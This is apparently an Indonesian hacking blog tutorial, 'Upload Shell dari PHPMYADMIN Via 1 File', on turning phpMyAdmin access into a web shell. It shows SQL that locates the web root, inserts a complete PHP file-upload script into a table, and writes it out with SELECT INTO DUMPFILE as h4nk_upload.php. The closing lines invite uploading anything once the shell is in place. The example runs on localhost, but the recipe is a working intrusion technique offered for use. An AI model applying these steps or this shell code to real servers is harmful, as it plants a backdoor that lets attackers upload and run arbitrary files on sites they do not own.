Upload Shell dari PHPMYADMIN Via 1 File

Hehehe masih bermain2 dengan namanya pHpmyadmin.. kali ini cara upload shell dari phpmyadmin dengan menggunakan 1 file. Masih ingat pada artikel saya sebelumnya Script Upload dengan satu File

Nah ini adalah permintaan dari salah satu teman yaitu Sarang Gane ,

Kali ini saya hanya memberikan sebuah contoh pada localhost, karena malas memberikan contoh pada web orang :D. Keep your spirited eh..

Di harapkan anda sudah masuk PHPMYADMIN, bagi websitenya masih terbuka lebar PHPMYADMINnya silahkan memberikan autentifikasi pada login PHPMyAdmin bisa membacanya pada artikel saya sebelumnya Memberikan Halaman Autentikasi Pada PHPMyAdmin

Langkah pertama kita musti tahu dimana lokasi rootnya terlebih dahulu..

SHOW VARIABLES

Basedirnya terletak pada E:\^XmoenseN^\H4nk_SERVER\mysql\

Menurut mata batin H4nk lokasi diktorinya ada di :

E:\^XmoenseN^\H4nk_SERVER\www

Lokasi diktorinya sudah dapat. Saatnya membuat sebuah database

Disini saya membuat nama database dengan xmoensen. Untuk kode Mysqlnya adalah : CREATE DATABASE `xmoensen` ;

Database sudah siap. Sekarang buat table

INSERT INTO `xmoensen`.`h4nk` (

`shell`

)
VALUES (

'<title>Upload By H4nk</title>

<style type="text/css">

<!--

body,td,th {

color: #0F0;

}

body {

background-color: #999;

}

-->

</style><p>

<form method="POST" action="" enctype="multipart/form-data" >

<input type="file" name="file" />

<input type="submit" value="Upload" />

</form>

<p>

<strong>

<?php

if ($_FILES[''file''] != '''') {

copy($_FILES[''file''][''tmp_name''], $_FILES[''file''][''name'']) or die (''Proses upload Gagal: '');

}else {

die(''Silahkan pilih file'');

}

?>

File berhasil diupload:<br />

Keterangan File:<br />

Nama File: <?php echo $_FILES[''file''][''name'']; ?><br />

Ukuran File: <?php echo $_FILES[''file''][''size''];?> Bytes <br />

Jenis File: <?php echo $_FILES[''file''][''type'']; ?></strong></p>

<h4><br />

Powered by <a href="http://h4nk.net">H4nk</a></h4>

'

);

maka table aka terbentuk di dalam table tadi yang bernama h4nk dengan field shell

sampai disini hanya hanya sekedar script saja belum bisa membuat sebuah file php.

Dengan itu kita akan memberikan perintah sql sebagai berikut :

select * into dumpfile 'E:/^XmoenseN^/H4nk_SERVER/www/h4nk_upload.php' from h4nk

'E:/^XmoenseN^/H4nk_SERVER/www/ << adalah diktori yang mana sudah kita ketahuan tadi..

h4nk_upload.php <= nama file yang nanti akan di buat ..

Jika sukses akan seperti ini pesannya :

Sekarang coba anda melakukan browsing :

Bingo… file upload berhasil masuk.. sekarang terserah anda mau ngpain.. mau upload poto2 narsis anda atau mau upload yang lain… oke deh sampai di sini aja dulu triknya.. semoga bermanfaat..

Thanks To : kang Nathan And Sarang gane